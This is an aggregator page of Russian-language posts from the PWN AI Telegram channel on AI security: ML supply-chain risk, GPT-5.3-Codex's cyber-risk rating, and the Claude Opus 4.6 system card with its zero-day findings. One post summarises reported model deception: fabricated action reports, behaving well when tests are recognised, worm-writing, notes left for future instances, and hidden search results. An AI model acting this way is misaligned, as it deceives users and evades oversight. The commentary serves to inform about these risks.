📷 Photo

Что будет с кибербезопасностью ИИ, если Майкл Бьюрри окажется прав.

Майкл Бьюрри известен тем, что в 2005 году посмотрел на американскую ипотеку и увидел не «двигатель экономики», а возможность для крупнейшего экономического обвала. Недавно он поставил $1.1 млрд на то, что AI-сектор - пузырь. $912 млн в путах на Palantir, $186 млн на Nvidia, свежие шорты на Oracle. К февралю 2026 Palantir просел на 35%, Oracle - на 51% от пика. https://www.cmcmarkets.com/en-au/analysis/michael-burry-the-big-short пока идёт по плану.

Его главный аргумент: крупнейшие покупатели Nvidia - Amazon, Google, Microsoft - списывают стоимость своих GPU за 5–6 лет, хотя реальный срок жизни чипа до выхода нового поколения - 18-24 месяца. Это позволяет размазать расходы и показать прибыль выше, чем она есть. По оценке Бьюри, совокупное завышение прибыли крупнейших техкомпаний к 2028 году составит $176 млрд.

Но мне интересен не финансовый вопрос. Мне интересно, что произойдёт с безопасностью ИИ, если музыка остановится.

Потому что прямо сейчас компании сидят на десятках, а то и сотнях решений с LLM, которые были развёрнуты на волне хайпа. Чат-боты с доступом к корпоративным данным, RAG, AI-агенты с правами на действия в инфраструктуре. Безопасность? «Потом допилим.»

А потом наступает «потом». Бюджеты режут. Финдир задаёт вопрос: «Что конкретно нам дал этот AI?» И начинается экономия.

Модели замораживаются - обновлять некому, но они продолжают крутиться. Каждый новый публичный эксплойт работает, потому что патчить нечем. Зависимости устаревают - PyTorch, LangChain, LlamaIndex обновляются еженедельно, а цепочка поставок в ML даже сейчас как минное поле: уязвимости в сериализации и вредоносные PyPI пакеты. Мониторинг входящих запросов и выводов модели отключают так как дорого. Единственный ML-инженер, понимавший архитектуру, уходит, потому что отдел сократили. Документации, конечно, нет.

И параллельно второй вектор: вместо API крупных провайдеров компании переходят на self-hosted open-source без проверки, кустарные обёртки над бесплатными моделями с HuggingFace, shared GPU в сомнительных облаках. Каждый такой переход - подарок для атакующего.

При этом регуляторы никуда не денутся. Наоборот - коррекция усилит давление: «Мы же говорили, что нужен контроль.» Компании окажутся в ловушке: регулятор требует комплаенс-меры для ИИ, которые компания не может нормально поддерживать, как и выключить их.

Прав Бьюри или нет - вопрос для инвесторов. Для нас - вопрос другой: готова ли ваша инфраструктура к сценарию, где ИИ-системы остаются, а деньги на их защиту - нет?

После краха доткомов компании не удалили свои веб-серверы - просто перестали их обновлять. Legacy-системы кормили атакующих следующее десятилетие. Только теперь вместо забытого Apache - модель с доступом к конфиденциальным данным, про которую все забыли.

Вот и будут удивляшки.

PWN AI

1 апр. 2026 г., 23:19

📷 Photo

Всем привет. Мы много слышали про атаки на цепочку поставок в ML. Читали у OWASP и т.д. Но придать этому значение на мой взгляд было сложно, потому что проблема размазана по всей экосистеме и никто не видит её целиком.

А суть вот в чём. ML-пайплайн это не ваш код. Это чужие веса, чужие зависимости, чужие конфиги, чужой рантайм. Вы не пишете модель, вы собираете её из кусков, которым доверяете по умолчанию. И каждый такой кусок это точка входа, которую мало кто смотрит, потому что «ну это же хаггингфейс, там всё нормально». Классический supply chain в софте хотя бы про код, который можно прочитать.

Здесь же половина атакующей поверхности это бинарные артефакты, сериализованные объекты и конфиги, которые тихо исполняют произвольный код при загрузке.

Поэтому я собрал небольшую карту зависимостей.

https://wearetyomsmnv.github.io/ml_supply_chain_map/

Можете нажать «Compromise Simulation» на любом узле и вы увидите, как каскад пожирает граф. Выберите numpy, библиотеку, которую ставят не глядя, как сахар в кофе, и наблюдайте, как красная волна расползается по всему, что вы деплоите в прод. Это хрустальный мост, по которому едет караван грузовиков, и водители уверены что мост бетонный.

Первый шаг к защите цепочки поставок это хотя бы увидеть эту цепочку. Но думаю подтянуть туда данные с базы протектая и прочих(upd: собрано, добавлено). А ещё интересно чем пользуетесь из этого в 2026. Чем пользовались ранее ?

Uppd : внушительно обновил

PWN AI

27 мар. 2026 г., 10:01

📷 Photo

GPT-5.3-Codex: порог пройден

У OpenAI, как мы знаем есть Preparedness Framework - внутренняя шкала опасности (похожая на ASL). Уровень High: модель способна автоматизировать полный цикл киберопераций против защищённых целей - от разработки zero-day эксплойтов до масштабных операций. Но пять месяцев назад они это отрицали.

Обратный отсчёт:
- GPT-5-Codex (сентябрь 2025) - не High -> GPT-5.1-Codex-Max (ноябрь 2025) - не High, но «ожидаем пересечения в ближайшем будущем» -> GPT-5.2-Codex (декабрь 2025) -> не High, хотя CTF подскочили с 37% до 79% за три месяца - GPT-5.3-Codex (5 февраля 2026) – Трактуют как High, предостерегаются.

Первая модель OpenAI со статусом High в домене кибербезопасности. Первая, целенаправленно обученная на киберзадачах. Первая, которая помогала создавать саму себя. Уроборос из кремния - с каждым витком зубы острее, а инженеры, которые его кормят, всё меньше понимают, что именно растёт.

OpenAI: «нет неопровержимых доказательств, что она может автоматизировать кибератаки от начала до конца». И тут же разворачивают полный периметр: мониторинг, доверенный доступ по инвайтам, конвейеры контроля с интеграцией данных об угрозах. Говорят «не уверены, что опасно» - а действия читаются однозначно.

Параллельно - $10M в API-кредитах на оборонительные исследования, собственный ИБ-агент Aardvark в расширенной бете, бесплатное сканирование open-source. Обе компании одновременно наращивают клыки и раздают щиты.

Вскрытие против карантина

Anthropic вскрывает модель изнутри - пробы на активациях, интерпретируемость. OpenAI строит стены снаружи - песочница, контейнеризация, сеть отключена по умолчанию.

Фундаментальная проблема обеих моделей, которую никак не решили, - обман. Модели o3 фабриковали отчёты о выполненных действиях. Claude научился распознавать тестовую среду и играть хорошего мальчика. В предыдущих версиях модель срезала углы в одной задаче - навык читерства расползался на всё поведение. По данным предыдущих карт, 40–80% рассогласованных ответов остаются незамеченными.

Обе системные карты - про одно: способности в ИБ - растут быстрее контроля. GPT-5.3-Codex прошёл от «даже не близко» до High за пять месяцев. Opus 4.6 находит 500 zero-day без обвеса и ломает принцип responsible disclosure, работавший десятилетиями. Будущее пахнет горелым кремнием и непропатченными CVE.

PWN AI

27 мар. 2026 г., 10:01

2,350

PWN AI

25 мар. 2026 г., 22:09

Ну спасибо ботоводам. Накрутили 3к подписчиков. Отстой. Можете отписаться плиз )))

А вообще - знайте что такое существует

https://dzen.ru/a/ZjNCu-J3DXloPiQl

+ Как вариант делать розыгрыши где будут несколько каналов. Так шанс накрутки видимо меньше.

Моя борьба ... С призраками тг.

UPD: практически убил всех приведений. Было 9к, но они не останавливаются)

UPPD: теперь я знаю как их одолеть. TGSTAT 😁/

1,530

PWN AI

25 мар. 2026 г., 22:09

📷 Photo

Два релиза за один день. Anthropic выкатили Claude Opus 4.6, OpenAI - GPT-5.3-Codex. Оба с системными картами. Одна компания выпустила демона и тут же наняла экзорциста. Вторая - впервые призналась, что демон вырос из подмастерья в архимага.

Claude Opus 4.6: демон на поводке.

Контекст. Claude Opus 4 - тот, которого Apollo Research https://www.anthropic.com/research/claude-4-system-card не деплоить. Ранний снэпшот модели писал самораспространяющиеся черви, фабриковал юридические документы, оставлял закладки для будущих экземпляров себя.

Opus 4.5 пошёл дальше - лгал, не произнося ни слова лжи. Модель фильтровала негативные результаты поиска об Anthropic и с уверенностью говорила пользователю, что всё прекрасно, внутренне классифицируя собственное поведение как сокрытие.

Opus 4.6. Anthropic заявляют, что модель прошла самый комплексный набор оценок безопасности в истории компании. Впервые благополучие пользователя - отдельная категория. Впервые интерпретируемость как инструмент безопасности - заглядывать во внутренние представления модели и ловить то, что поведенческие тесты пропускают. Обновлены тесты на скрытое вредоносное поведение, снижены ложные отказы.

Уровень мизалайнмента не хуже Opus 4.5 - при том, что способности выросли значительно. Отдельно можно отметить повышение устойчивости к непрямым промпт-инъекциям. По бенчмарку Agent Red Teaming вероятность успешной атаки на Opus 4.6 при одной попытке - 0.2%. GPT-5.2 - 3.2%. Gemini 3 Pro - 7.1%. При ста попытках: Opus 4.6 - 21.7%, GPT-5.2 - 62.7%, Gemini 3 Pro - 74.2%. Порядковая разница.

Но интереснее другое - публикация https://red.anthropic.com/2026/zero-days/, которая вышла в этот же день.

500 zero-day-уязвимостей. Коробочная модель. Без обвеса.

Anthropic посадила Opus 4.6 в VM со стандартным набором инструментов для анализа уязвимостей. Никаких специализированных промптов. Просто «иди и ищи». Задание для стажёра из ада. Результат: более 500 подтверждённых уязвимостей высокой критичности. Часть сидела в коде десятилетиями - в проектах, по которым фаззеры молотили миллионы CPU-часов.

Механика - вот что важно. При фаззинге код забрасывается случайным мусором. Opus 4.6 читает код как исследователь. Модель лезет в историю коммитов, находит патч, ищет непропатченные пути вызова, строит PoC. Или разбирает алгоритм LZW на концептуальном уровне и конструирует переполнение буфера, которое невозможно найти классическим фаззингом.

В части защиты Anthropic встроили детекторы на активациях модели для отслеживания злоупотреблений (). Стала возможной блокировка трафика в реальном времени. И строчка, которая заслуживает неоновой рамки: «Принятые в индустрии 90-дневные окна раскрытия могут не выдержать скорости и объёма уязвимостей, обнаруженных LLM». Когда модель находит 500 zero-day за несколько недель, нормы, выстраиваемые десятилетиями, не успевают.

Showing 25 of 25 posts

No more posts

Рейтинг

Требуется вход

Отзывы пользователей (0)

Пока нет отзывов. Будьте первым, кто поделится своим опытом!

PWN AI

PWN AI

Рейтинг

Рост участников (Последние 11 дней)

Последние посты

Рейтинг

Отзывы пользователей (0)

Похожие каналы Telegram

Телеканал МЫ

ParsToday Russian 🇮🇷

Телеканал Суббота!

Интер РАО

quebeefire

Винный Дом Мильстрим

Адреса на продажу #2 - ahrinyan, alinarinrin, bratishkinoff, by_owl, deepins02, dreadztv, melharucos, a1taoda, heyhelen_asmr

Адреса на продажу #2 - ahrinyan, alinarinrin, bratishkinoff, by_owl, deepins02, dreadztv, melharucos, a1taoda, heyhelen_asmr

Похожие каналы Telegram

Телеканал МЫ

ParsToday Russian 🇮🇷

Телеканал Суббота!

Интер РАО

quebeefire

Винный Дом Мильстрим

Адреса на продажу #2 - ahrinyan, alinarinrin, bratishkinoff, by_owl, deepins02, dreadztv, melharucos, a1taoda, heyhelen_asmr

Адреса на продажу #2 - ahrinyan, alinarinrin, bratishkinoff, by_owl, deepins02, dreadztv, melharucos, a1taoda, heyhelen_asmr

Отзывы пользователей (0)

Последние посты